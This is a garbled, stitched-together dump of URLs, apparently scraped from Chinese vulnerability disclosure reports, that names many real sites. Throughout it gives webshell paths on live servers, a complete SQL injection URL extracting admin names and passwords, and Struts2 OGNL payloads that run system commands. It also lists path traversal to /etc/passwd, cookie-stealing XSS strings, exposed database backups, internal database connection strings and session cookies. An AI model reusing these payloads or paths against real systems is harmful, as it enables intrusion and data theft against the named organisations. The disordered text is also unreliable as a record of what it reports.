http://corp.metersbonwe.com/shownewsCorp.php?id=88 http://corp.metersbonwe.com/shownewsCorp.php?id=88 http://corp.metersbonwe.com/shownewsCorp.php?id=88 http://210.72.11.110:8080/storage/Silic.jsp http://210.72.11.110:8080/storage/oppop.jsp http://pplms.cn/x/admin/IndexManage.asp http://pplms.cn/x/admin/Template/TemplateManage.asp?CurrPath=%2Fx%2F http://pplms.cn/x/admin/Template/Template.asp?Action=Modify&FileName=Config%2Easp&CurrPath=%2Fx%2FConfig http://ip.app.letv.com/api/SubmitIpLocSave.dhtml, http://www.sach.gov.cn:80/module/download/downfile.jsp?filename=* http://bbs.jd.com/home.php?mod=space&uid=1&do=profile http://bbs.jd.com/forum.php?mod=viewthread&tid=25&extra=page%3D1 site:bbs.jd.com inurl:profile http://bbs.jd.com/home-space-uid-4-do-profile-view-me.html http://bbs.jd.com/admin.php http://www.mbmuseum.org/admin/index.html http://www.w3.org/TR/html4/loose.dtd http://www.w3.org/TR/html4/loose.dtd http://www.wiseuc.com/admin/downcom/list.php http://www.wiseuc.com/admin/news/list.php http://www.wiseuc.com/upload/userfiles/files/test.txt/.php http://news.7k7k.com/huodong/201307editor/ http://8.7k7k.com http://news.7k7k.com/huodong/201307editor/网站 http://8.7k7k.com的相关页面 http://tieba.07073.com/search存在Post注入漏洞,注入后,发现好多好多数据库。 http://121.14.129.203/user/myinfo.do http://www.joinwish.com/wish/show/id/10067221 http://jwxt.zhongxi.cn/jwweb/_photo/Student/201100000001.jpg http://jwxt.zhongxi.cn/jwweb/_photo/Student/201100000318.jpg http://61.158.99.132:8084/manager/ www.cpi.net.cn http://www.joinwish.com/wish/show/id/10067637 http://get.766.com/go.php?id=7385 http://mail.catr.cn/js/ http://mail.catr.cn/mail,后面没有/,会下载一个十几M的文件,解压后一百多M,是邮件的日志,这可是只有管理员才能看的东西。 http://eoffice8.weaver.cn:8028/general/file_folder/file_new/neworedit/index.php?FILE_SORT=&CONTENT_ID=123&SORT_ID=166&func_id=&operationType=editFromRead&docStr= http://180.149.136.75/212 http://180.149.136.75/uploadfile http://taise.org.tw/ taise.org.tw/active_areashow2.php?id=67 http://taise.org.tw/taise_admin/login.php http://tu.duowan.com/index.php?r=view/gallery&id=70883,是个图站 http://tu.duowan.com/admin/default/index.html http://seentao.yonyou.com/admin http://health.yonyou.com http://health.yonyou.com/readme.txt数据库信息 http://health.yonyou.com/yiliao.sql数据库备份 http://health.yonyou.com/admin/fckeditor/editor/fckeditor.html编辑器 http://gov.yonyou.com/ http://gov.yonyou.com/list.php http://gov.yonyou.com/read.php http://gov.yonyou.com/fwzc/test.php http://kj.qdf.gov.cn:1010/win/showsignup.ashx?signupid=101 http://kj.qdf.gov.cn:2020/win/showsignup.ashx?signupid=101 http://en.teleinfo.catr.cn/default.aspx http://en.teleinfo.catr.cn/ScriptResource.axd?d=xPMQD-3lLhQqKPmxbmtZVmBfNKoiG26UCsIxATZstWQAAAAAAAAAAAAAAAAAAAAA0 http://mmsdiy.tom.com/chinamobile/showtmpimg.php?tmpfilename=../../../../../../../../../../../../../../etc/passwd http://jingboquan.com http://jingboquan.com/admin_upfile.asp http://oa.ketd.gov.cn/bak.rar http://jh.gametea.com/ www.gametea.com也是用phpcms改的 http://jh.gametea.com/ http://www.jyczj.gov.cn/jyczj/sitePages/subPages/page.action http://www.jyczj.gov.cn/jyczj/jspspy.jsp http://fda.jiangyin.gov.cn/jyfda/sitePages/subPages/page.action http://fda.jiangyin.gov.cn/jyfda/sitePages/subPages/page.action jdbc:mysql://192.168.1.106/jywcms?autoReconnect=true jdbc:mysql://192.168.1.106/jywcms_function?autoReconnect=true jdbc:mysql://192.168.1.106/count?autoReconnect=true jdbc:mysql://192.168.1.106/jywcms?autoReconnect=true jdbc:oracle:thin:@192.168.1.122:1521:JYZW jdbc:microsoft:sqlserver://32.58.254.242:1433;Databasename=Jy12345Temp http://jx.china.com.cn虽然普通的plus的90sec.php漏洞页面维修好了,可是/plus/mytag_js.php?aid=9090这里还是可以写入一句话, http://125.65.165.8:7001 http://job.bjcsair.com/index.action http://job.bjcsair.com/Silic.jsp http://www.xunyang.gov.cn/ewcms/login.do http://www.xunyang.gov.cn/ewcms/Silic.jsp http://210.76.65.123:81/FPApp/wbxx/news/list.jsp?id=4 http://www.hasmx.hrss.gov.cn/survey/survey.aspx?id=-1 http://www.eq.hh.cn/seismic/listCatalog!index.action?eqQuery.entityName=Catalog_R http://www.eq.hh.cn/Silic.jsp http://bbs.crsky.com/thread_sort.php?fid=204 http://yp.eol.cn/jichengselectedlist.php?province=%CB%C4%B4%A8&membertypeid=1 http://yp.eol.cn/mana/ http://busass.chanjet.com:8080/reg/reg!regIndex.do http://crm.chanjet.com/backup/.svn/ http://crm.chanjet.com/backup/lib/.svn/entries http://crm.chanjet.com/backup/.svn/entries http://crm.chanjet.com/account/import/.svn/entries http://busass.chanjet.com:8080/fckeditor/editor/fckeditor.html http://www.hejiang.gov.cn/template/hjxmj/news_detail.jsp?id=5c26e0783fe8a7df013fec1279a301b3 http://202.127.42.180/ http://202.127.42.180/shell.asp;.txt http://202.127.42.180/test.txt https://mail.gsedu.gov.cn/login.php http://www.yunfufgj.gov.cn/ http://www.yunfufgj.gov.cn/Silic.jsp http://www.yunfufgj.gov.cn/test.txt http://www.yunfufgj.gov.cn/oppppo.jsp http://app.yule.sohu.com/test/ http://mail.sohu.com/mapp/manage.jsp http://ecard.mail.sohu.com/admin/ http://05133.astro.women.sohu.com/article_show.php?article_id=12211 http://tv.sohu.com/upload/11tvhead/.svn/entries http://picture.auto.sohu.com/manual/ http://csldata.sports.sohu.com/team.php?teamid=4&season=2013 http://mirrors.sohu.com/ http://mail.chinaren.com/images/ http://mail.chinaren.com/reg/ http://www.w3.org/TR/html4/loose.dtd http://hantao.m1905.com/inc/book.asp?nid=175339 http://www.zyhyhq.com/helpinfo.jsp?id=999999.9%27+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C%28select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28manager.name+as+char%29%29%29%2C0x27%2C0x7e%29+from+%60zyhyhq%60.manager+Order+by+id+limit+0%2C1%29+%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536+and+%27x%27%3D%27x http://www.zyhyhq.com/helpinfo.jsp?id=999999.9%27+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C%28select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28manager.pwd+as+char%29%29%29%2C0x27%2C0x7e%29+from+%60zyhyhq%60.manager+Order+by+id+limit+0%2C1%29+%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536+and+%27x%27%3D%27x http://bbs.changyou.com/inc/ http://bbs.ldj.changyou.com/bbs/stat/ http://bbs.ty.playcool.com/inc/ http://bbs.ldj.changyou.com/inc/ http://bbs.cyou.com/inc/ http://bbs.changyou.com/inc/ http://wgact.yeyou.com/sword/config.jsp http://wgacc.yeyou.com/login/ http://games.yeyou.com/img/ inurl:admin_edit.asp立即找到了整个网站的问题,而且不止是一个地方! http://bbs.game.changyou.com/ http://1.com\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029\u003e/1.swf www.joinwish.com http://www.joinwish.com/wish/show/id/1432 https://1.202.150.71/svn/ziroom/ http://e.mwork.org/sys/main.action http://hr.sohu.com/ http://www.wintalent.cn:8010/wt/login!input http://db.neotv.cn/lol/champion/Alistar#hero_comment http://my.elong.com/GrouponOrderDetail_cn.html?orderid=XXXXX http://fccszt.fccs.com/vote/fcwr/manage.jsp?page=1 http://venus.suning.com/ym/reg.aspx www.tianya.cn http://hr.www.net.cn/wt5/login!input http://www.gionee.com/68webmaster/index.php http://www.gionee.com/68webmaster/fck/editor/filemanager/connectors/php/upload.php http://www.gionee.com/68webmaster/filemanage.php?currpath=..%2F http://www.gionee.com//uploads/upload_files/month_1308/0818023328.php http://wed.27.cn/marry/set_index.php?action=set_memberstore&sid=165 http://wed.27.cn/marry/marryadmin/web/login.php http://www.ebfcn.com/ http://www.ebfcn.com/Job/JobInfo.aspx http://edu.bhmc.com.cn/portal/center/reg.action http://113.108.183.202/ http://fsq-database.cn.carrefour.com/login.action http://www.pcbpartner.cn/web/pinke/index.action http://sms.12321.cn/index.jsp http://jys.picchealth.com:8080/login.action http://jys.picchealth.com:8080/Silic.jsp http://zhdajy.zhda.gov.cn:8080/login.action http://zhdajy.zhda.gov.cn:8080/Silic.jsp http://202.96.24.12/ http://114.80.84.105/fna/login.action http://114.80.84.105/fna/guige.jsp http://202.96.54.116 http://202.96.54.116/shell.aspx http://fax.7daysinn.cn:77/ http://www.mdjnx.com/index!elecBank.action http://www.mdjnx.com/index.action http://qk.cams.cma.gov.cn/jams/ch/index.aspx?year_id=2013&quarter_id=3 http://mp.weixin.qq.com/mp/redirect?url=126.am/FhNRD3 http://112.83.254.19:83/ www.tuniu.com-access_`/bin/date www.tuniu.com.`hostname`.log http://jingdian.tuniu.com/bdb/place_desc.db www.tuniu.com-access_`/bin/date www.tuniu.com.`hostname`.log http://www.ipcc.cma.gov.cn/ http://www.ipcc.cma.gov.cn/background/index.php?lang=cn&NewsID=18 http://m.tianya.com http://m.tianya.cn/index.jsp?idwriter=81847003&key=*********&chk=******************************** http://116.246.39.203/announce.aspx?id=722 bt:/pentest/database/sqlmap# http://116.246.39.203/announce.aspx?id=722 http://61.183.11.149:8081/目录遍历 http://61.183.11.149:8081/web/webmanage/web_manage.asp http://bbs.wan.sogou.com/images/default/logo.gif/.php http://bbs.wan.sogou.com/attachments/month_1308/130819133046dedb379520fb11.jpg/.php http://www.hbws.tv/video/show.php?itemid=1109 http://www.baidu.com/?a=1 http://ting.zhaoxiaoshuo.com/data/upload/1376889945_f3b94e88bd1bd325af6f62828c8785dd.php http://ting.zhaoxiaoshuo.com/public_m/js_player/.svn/entries ftp://183.61.XX.XX/ http://www.fsa.aero http://www.fsa.aero/fsp/FsPlistflight.php?listflight=49788 http://www.f-roadpay.com.cn/login.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://wlkpc.965432.com/wlkpClient/home.do http://www.joinwish.com/wishsquare/index/val/1 http://www.joinwish.com/wishgive2/index/new/Y/wish_id/10067768 http://tvplay.pptv.com/search http://2sc.sohu.com http://118.85.207.27:8000/login.action encap:Ethernet FC:8A:74 addr:10.10.21.22 Bcast:10.10.21.255 Mask:255.255.255.0 fefc:8a74/64 Scope:Link MTU:1500 packets:406163456 packets:269985946 txqueuelen:1000 http://school.suning.cn/article.php?id=10 http://school.suning.com/system/ http://school.suning.com/system/main.php http://school.suning.com/system/menu.php http://bbs.zhongsou.com/index/amchart/trend_h/data.php?d=1343 http://weike.zhongsou.com/bbs/uc_server/avatar.php?uid=2344 http://weike.zhongsou.com/bbs/uc_server/avatar.php?uid=2344 http://d3channel.zhongsou.com/Api/CateInformation.ashx?cateid= http://uhome.blogchina.com/tempRegUser.action http://ywt.blogchina.com/selectAll.action http://download.blogchina.com/social/weixin2012/index.action http://uhome.blogchina.com/guige.jsp http://ywt.blogchina.com/guige.jsp http://download.blogchina.com/social/guige.jsp http://xueji.jxt189.com/hechi http://game.pipi.cn/checkUser.action http://dggjj.dg.gov.cn/tbdownload/downloadfile.asp?strfilenm=文件地址 http://so.766.com/web.jsp?keyword=%3Cscript%3Ealert%28%27Hello%20World!%27%29%3C/script%3E http://202.101.163.196:81/sql.aspx http://202.101.163.196:81/ http://bbs.hjsm.tom.com/uc_server/ http://erp.998.com/WebPortal_Operation/OperationWeekReportData/AuditAlert.aspx http://erp.998.com/webportal_electroniccommerce/Channels.aspx http://jxcrj.com/text/webtext.aspx?type=-1 http://mis.998.com/portal/workflow/prints/shiyongqizhoubao.aspx?instanceid=d961b9f3-fe32-4ae8-a8fe-77663f7a5c47 http://mis.998.com/greentreeinn/CheckLogon.aspx?Uname=bGlhbw== http://mis.998.com/Portal/SelectUser.aspx?UserControl=ctl01&Mode=Multi&UserIDControl=ctl02&UnitType=8&VisibleUnitType=15&VisibleType=1&VisibleUnits=&Level=100&ExpandDepth=1 http://youxi.baomihua.com/tuiguang.aspx?pageid=180 http://www.yakool.com/login.action http://www.huyigroup.com.cn/manage/ http://www.huyigroup.com.cn/manage/manage.php http://s.6677bank.com/shuyin/searchPage.do?tagType=1&tagStr=%27 https://login.shfft.com/jumpLogin.action http://shop.wondershare.cn/shop/goods!search.action http://hzbench.homelink.com.cn/agentbench/agent/login.action http://bbs.play.cn/ http://www.5lily.com/shop/goods!search.action http://ipaper.cnhan.com/seo/queryArticlesByDateAction.action http://www.jcjob.cn/qyzp.action http://i.auto.sohu.com/user/message/send.at xxx.xx/x.js http://pk.tom.com/web/download_page.jsp?from=00403&q_id=99&mobile_game_id=609,注入点mobile_game_id http://xshow.pipi.cn/index.php?r=user/openLogin&type=../../../../../../../../../../etc/passwd%00.jpg https://www.vips100.com/ http://315.in.sohu.com/Complaints/add http://www.cctvdream.com.cn/dynasty/works.php?api=qry http://124.127.255.3:8080/ http://www.zsb.pudong-edu.sh.cn/CenterWeb/xjgl/index.asp?SearchValue=%27&LmID=74&submit=%CB%D1%CB%F7 http://www.ecare365.com/ http://jiameng.edai.com/empower.aspx?condition=1 http://box.7k7k.com/manage/ http://www.domain.gov.cn/siteserver/CMS/console_tableMetadata.aspx?ENName=cms_Content&TableType=BackgroundContent http://www.domain.gov.cn/siteserver/Upgrade/default.aspx http://gh.syd.com.cn/dio/browse/ http://gh.syd.com.cn/dio/browse/listAffairByPagegh.do http://meeting.staff.xdf.cn/GA/main/链接后面,如http://meeting.staff.xdf.cn/GA/main/123456 http://fj.voole.com/movie.action http://www.fmi.com.cn/admin.php/Party/ http://www.fmi.com.cn/admin.php/User/userScoreList/ http://www.fmi.com.cn/admin.php/AuditorScore/ http://smbservices.lenovo.com.cn/test/fengling/Data/ http://www.ankang.ccoo.cn/login.asp http://e-learning.lenovo.com.cn/forum/uc_server/admin.php http://engine.cqvip.com http://engine.cqvip.com/zhuanti/list.aspx?cid=12 http://cp.shoujibao.net/ www.wmgov.cn http://web.admin5.com/2.txt inurl:/class/?1.html inurl:class/index.php?catid=0 inurl:/page/html/?1.html http://home.www2.soufun.com/pwdapply.php http://bea.sportq.com:8081/SportQBkAdmin/userinfo.html http://bea.sportq.com:8081/SportQBkAdmin/userinfo.html?findUserDetail&&userId=10000 http://222.85.90.62/advertisement.do http://ltms.lenovo.com/ http://ltms.lenovo.com/Order/PackingQuestionItemList.aspx?Ord=0005987151&Seq=000010 http://dcs.lenovo.com.cn/dc/main!doLogin.action http://www.nongfuspring.com/app/about.action http://lis.lenovo.com/lots/Login.aspx www.doctorcom.com http://dns.aizhan.com/?q=www.doctorcom.com http://www.hnea.gov.cn/manage/content/docmanage/download.jsp?filePath=/../../../../../../etc/passwd http://202.196.13.210/ http://210.27.80.87/ http://202.121.166.201:8000/ http://www.bowenedu.cn/da/index.htm http://www.egotour.cn/index.do?method=toIndex http://www.egotour.cn/css3.jsp http://m.baidu.com/from=1787a/bd_page_type=1/ssid=0/uid=5A18364DCDF1B93D7CE99B7AF2919A15/pu=sz@1320_480,osname@browserandroid,cuid@BDB_95a2cc5ac8c04215-063370578443468%7C8769632031,ua@BDB_320_480_android_1.87.0.0_j2,ut@SL-Z8_4.02_10,usm@0,ta@bmb_2_2.3_5_2.2/w=0_10_https://aq.qq.com/cn2/findpsw/mobile_web_find_input_account?account=1********1/t=zbios/l=3/tc?srd=1&dict=20&src=http://www.wooyun.org/bugs/wooyun-2010-032481 aq.qq.com/cn2/findpsw/mobile_web_find_input_account?account=1********1 http://qd.epweike.com/test.php http://183.60.115.244/adduser.jsp) http://car.hbtv.com.cn//kuxl_w_show.aspx?lx=m104m001&id=667 http://pccarertest.lenovo.com.cn:81/lenovo/ http://pccarertest.lenovo.com.cn:81/lenovo/downfile.php http://pccarertest.lenovo.com.cn:81/lenovo/images/1.php http://info.jctrans.com/zxzx/qygg/AnnoDetail.aspx?id=262959 http://action.jctrans.com/vote/info/frmindex.aspx?id=2 http://www.taobao.com/go/act/sns/taoban_iphone.php?apkid=%22%3E%3Cscript%3Ealert%28/wooyun/%29%3C/script%3E%3Cimg http://env.nankai.edu.cn/lab/ http://env.nankai.edu.cn/lab/news.asp?fileid=60 http://env.nankai.edu.cn/lab/video.asp?fileid=1 http://env.nankai.edu.cn/lab/admin/default.asp http://env.nankai.edu.cn/lab/admin/Southidceditor/datas/SouthidcEditor.mdb http://jqyx.17u.com/admin http://edp.nankai.edu.cn/search/index.php?page=1&catid=&myord=uptime&myshownums=20&key=88952634 http://www.xxx.com/admin/regUsersInfo.aspx http://www.17u.com/activity/17u-changyudongtian/ http://59.37.54.194:3606/111223/InstallRevisit.aspx http://59.37.54.194:1000/ http://121.32.136.21:1000/ http://202.104.214.67:1000/ http://movie.douban.com/subject/20388223/comments?sort= http://www.twsm.com.cn/flash_upload.php?modelid=189 http://www.wuling.com.cn/fiwebeditor/admin/upload.aspx?id=1&dir=../../../ http://x.x.x.x:8866/ZWeb/login/login.aspx bt:/pentest/database/sqlmap# http://www.98tuan.com.cn/do/search.php http://youth.sdu.edu.cn/system.jsp http://lefen.lenovo.com/index.php/Kebi/ http://data.euro2012.sohu.com/player/ajax/player_list.ajax.php?team_id=239 http://pan.baidu.com/share/link?shareid=172262024&uk=4164057933 https://passport.lenovo.com/wauthen/login?lenovoid.action=uilogin&lenovoid.source=browser:realm:chita.lps.lenovo.com&lenovoid.realm=chita.lps.lenovo.com&lenovoid.uinfo=username&lenovoid.cb=http://lefen.lenovo.com/lfb/lenovo.php?mod=login https://passport.lenovo.com/wauthen/login?lenovoid.action=uilogin&lenovoid.source=browser:realm:chita.lps.lenovo.com&lenovoid.realm=chita.lps.lenovo.com&lenovoid.uinfo=username&lenovoid.cb=http://vip.yupage.com/lenovo.php http://vip.yupage.com/lenovo.htm http://www.lenovo.com.cn/?[令牌 http://202.107.203.25/ http://sd.189.cn/ecs_search/search_type_all/admin/ http://city2010.house.sina.com.cn/52shanghai/search.php www.whmc.edu.cn/jl_admin/ http://220.189.211.69:85/FrameSet/Login.aspx http://220.189.211.69/xiaofang/ chinese.hust.edu.cn/admin/ http://58.221.253.59:8081/ http://mail.qq.com/cgi-bin/mail_spam?action=check_link&url=此处是跳转的url地址 http://mail.qq.com/cgi-bin/mail_spam?action=check_link&url=http://www.m4sk.net http://) http://app.soccer.renren.com/go_rr.php?sid=16 http://ideaclub.lenovo.com.cn/forum/admin.php http://ideaclub.lenovo.com.cn/erazer/admin.php http://ideaclub.lenovo.com.cn/club/index.php?m=mycms&c=index http://ideaclub.lenovo.com.cn/terry/ http://blog.alipay.com/?s=%22%3E%3Cscript%3Ealert%28/wooyun/%29%3C/script%3E%3Cimg http://robot.dangdang.com/WebIm/page/officialPortal.jsp http://www.douban.com/location/wuhan/series?start=%22%3E%3Cscript%3Ealert% http://beijing.douban.com/series?start=%22%3E%3Cscript%3Ealert%28/Anonymous/%29%3C/script%3E%3Cimg http://guangzhou.douban.com/series?start=%22%3E%3Cscript%3Ealert%28/Anonymous/%29% http://shanghai.douban.com/series?start=%22%3E%3Cscript%3Ealert%28/Anonymous/%29% http://jz.cnse.gov.cn/ http://jz.cnse.gov.cn/jz.cnse.gov.cn.rar http://mail.cnse.gov.cn/ http://app.hujiang.com/cang/taList.aspx?lookuserid= http://bulo.hujiang.com/735850 http://app.hujiang.com/cang/taList.aspx?lookuserid=735850 http://bulo.hujiang.com/9713754/ http://app.hujiang.com/cang/taList.aspx?lookuserid=9713754 http://cctalk.hujiang.com/admin/active/frame_editboard.aspx?showBack=1&boardId=4165&username=6b6f6b656e6a616e65 http://bulo.hujiang.com/group/topic/811699/ http://forum.h3c.com/phpmyadmin/setup/ http://202.106.183.121:8080/csrcfund/IMG!execute.action http://202.106.183.121:8080/zzreport/login.action业务系统 clsid:CCF36A34-3024-46c5-904A-7867A9818DA3 http://avata.sdo.com/ http://jingqu.travel.sohu.com/sis/search/search.sis inurl:gov.cn/structure/ http://ess.lenovomobile.com/regiStep3.aspx?MbrID=6975&code=912348B2-1CE5-4695-9EA0-C4F6F283EAE8 http://wsj.qzlc.gov.cn/ http://wsj.qzlc.gov.cn/backup.rar http://www.crssg.com/ http://www.crssg.com/newshow.php?list=1972 http://www.yokagames.com/product/product/?id=53 http://house.21cn.com/admin/index.asp http://aa\x22\x3e\x3c\x69\x6d\x67\x20\x73\x72\x63\x3d\x31\x20\x6f\x6e\x65\x72\x72\x6f\x72\x3d\x61\x6c\x65\x72\x74\x28\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x6f\x6f\x6b\x69\x65\x29\x3e//.swf[/flash http://bbs.d.163.com/forum.php?mod=viewthread&tid=172718984&pid=186356073&page=1&extra=#pid186356073 http://ln.189.cn/biz/zqservice/zq_toPilotInfoPage.action?redirect%3A%24{%23a%3D%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27ifconfig%27}%29%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew%20java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew%20java.io.BufferedReader%28%23c%29%2C%23e%3Dnew%20char[50000]%2C%23d.read%28%23e%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23e%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29 http://ess.lenovomobile.com/regiStep2.aspx?MbrID=8199 http://ess.lenovomobile.com/shopDtl.aspx?GdsID=A0900001586 http://61.132.107.156:8080 http://book.dangdang.com/list/hotReview_C01.1*.htm http://tieba.56.com/,回复帖子,插入图片后改包提交,后台未对提交的html内容做处理,如提交的内容为 soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/ xmlns:com="http://com.qwserv.itm.api.psl.ws soapenv:Header/ soapenv:Body com:getUser/ soapenv:Body soapenv:Envelope http://down.malataedu.com http://down.malataedu.com/info_details.php?q=312 http://down.malataedu.com/admin/index.php http://xsgl.sz.edu.cn:8008/jsp/login/Login.jsp http://www.bankofluoyang.com.cn/Aboutus.asp?Id=122%20and%201=1 http://xsc.bnu.edu.cn/xscdbadmin/ http://xsc.bnu.edu.cn/admin/admin.php http://www.cbrc.gov.cn/web1.war http://www.cmseasy.cn/wwwroot.rar http://ebidding.lenovo.com.cn/backoffice/getPass.aspx http://www.czsie.com.cn/ http://www.csbidding.com/nhzb/ http://nhzb.czsie.com.cn/nhzb/news_view.jsp?newsID=543 http://www.csbidding.com/nhzb/owner_bid_list.jsp?ownerid=25 http://www.phone366.com/Admin/BasePhoneList.aspx?p1=0&p2=1008&p3=11002010000105268660590&p6=True&fkey=STMemberManger http://www.phone366.com/Admin/BasePhoneListInd.aspx?p1=0&p4=2536&p2=110020100000910&p3=0 http://www.phone366.com/Admin/CompanyList.aspx?p1=0&p2=1008&p3=110020100001052&fkey=STEnterpriseManager http://www.phone366.com/Admin/BasePhoneList.aspx?p1=0&p2=1008&p3=110020100001052&p6=True&fkey=STMemberManger http://www.phone366.com/Admin/Site/ShortMessageList.aspx?p1=0&scode=2500&p3=110020100001052&fkey=PTSMSSentRecord&pqc= http://www.phone366.com/Admin/InformationList.aspx?p1=0&p3=2500&fkey=STSentMSGRecord http://www.phone366.com/Admin/Notice/NoticeManage.aspx?type=1&scode=2432&fkey=Notice http://www.phone366.com/Admin/Notice/NewsManage.aspx?type=2&scode=2500&fkey=News http://www.phone366.com/Admin/Notice/InvestManage.aspx?type=3&scode=1008& http://www.phone366.com/Admin/Notice/ActiveManage.aspx?type=3&scode=2416&fkey=Active http://legc.lenovo.com/ http://legc.lenovo.com/lefactory/static-content?contentPath=/etc/passwd http://legc.lenovo.com/ http://222.82.226.140:8880/userlogin.action http://222.82.226.140:8912/JgnhWeb/yhWriteSN.jsp http://222.82.226.140:8913/BtnhWeb/login.jsf http://developer.lenovomm.com/ http://developer.lenovomm.com/windev/ReadImageServlet?path=../../../etc/passwd http://www.oupeng.com/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../caches/configs/database.php http://manage.gstv.com.cn/Temp/PL.aspx?ID=2 www.cabr.com.cn http://www.cabr.com.cn/kxfzg/info-1.aspx?id=31 http://www.hngsjj.gov.cn/gsjj_login.php?mod=phpcms&file=login http://lyw.sh.gov.cn/db.rar http://www.zfj.gov.cn/db.rar http://ideaclub.lenovo.com.cn/club/index.php?m=goods&c=detail&goods_id=b65403d7fcf111e2add1f285c138d37b,是个插件注入。 www.pzhfzjz.gov.cn http://www.pzhfzjz.gov.cn/cn.aspx http://www.pzhfzjz.gov.cn/1937cN.html http://ms.lenovo.com/list.asp?id=23 http://www.hebsafety.gov.cn/www.rar http://www.zzfda.gov.cn/zzfda.rar http://www.gmj.suzhou.gov.cn/gmj.rar http://www.hebroads.gov.cn/hebroads.rar http://www.sncsjyj.com/news.asp?dhid=192 http://www.sncsjyj.com/zgadmin/login.asp http://www.sncsjyj.com/zgAdmin/SkyWebEditor/admin_style.asp http://ess.lenovomobile.com/shopLst.aspx?RackCode=A11 http://ess.lenovomobile.com/shopLst.aspx?PageSize=20&PageNum=1&OrderBy=PublishDate+Desc&EchoType=1&RackCode=A11 cookie:ASP.NET_SessionId=h3t1sdbpwidnyd45y2ntf0ni http://119.188.49.210/fc/addfeed?uid=xxxxx&sid=xxxxxxxxxxxxxxx&recentfid=xxxx&recenttime=1377316456&limit=20 Cookie:LTEJTXKKXCLEWJZYUFSJ=QDQCUDYKQOVLRNYWZFYFLLQQZOJPRZCZMHBRCGPZ http://222.247.56.19/m1/login.do http://222.247.56.19:8080/m1/login.do http://222.247.56.19:8080/m1/login.do?redirect%3A%24{%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29 http://svwtrainnet.csvw.com/ http://cpi.11185.cn/order/pay.action http://cpi.11185.cn/fs.jsp http://cpi.11185.cn/shell.jsp http://baike.baidu.com/link?url=eTD7zkgnz-QbtFnOpjtvr4V7q-OAZ6tkce2_AWYQmvWZvAKlKSqY4FcJ5DfxZUxK5xhXE1VqVaABCCAlE1rhRq http://reg.scjg.com.cn/前台万能密码登陆,进去后发现一个ewebedit编辑器,然后改了样式就xxoo了。能跨站。。服务器就没去提了,里面有些配置文件什么的,万网工程可不是闹着玩的,不能乱搞。。 http://www.dgase.com/ http://www.dgase.com/myadmin/htmledit/ http://www.dgase.com/myadmin/htmledit/admin_login.asp http://125.93.93.173/myadmin/htmledit/UploadFile/201332115743232.asp http://218.30.21.104/jfpt_gh/ http://pan.baidu.com/share/link?shareid=172262024&uk=4164057933 http://addon.discuz.com/?@mzg_advertise.plugin http://app.finance.ifeng.com/finance/fundhtml/jjjz_kfjj.php?oper_codei=1102&type=10200 http://app.finance.ifeng.com/finance/fundhtml/jjjz_kfjj.php?oper_codei=1102&type=10200 http://app.finance.ifeng.com/finance/fundhtml/jjjz_kfjj.php?oper_codei=1102&type=10200 http://app.finance.ifeng.com/finance/fundhtml/jjjz_kfjj.php?oper_codei=1102&type=10200 http://bc.ifeng.com/main/c?db=ifeng&bid=18545,18230,3990&cid=2670,68,1&sid=38435&advid=404&camid=4109&show=ignore&url=http://www.baidu.com http://movie.dangdang.com/list/longBestSelling_C05*.01_P1.htm http://ask.lenovomobile.com/ http://xss.tw/Result/Auth/hash/997a073ba4a75cee87acd205cc24e44a URL:http://www.7daysinn.cn/ajax/ajax_login.php Method:POST username:13800138000 password:123456 safecode:x5CC http://www.wandoujia.com/blog/wp-login.php http://developer.wandoujia.com/wp-login.php http://www.wandoujia.com/blog/?author=1 http://www.wandoujia.com/blog/?author=2 http://www.wandoujia.com/blog/wp-login.php 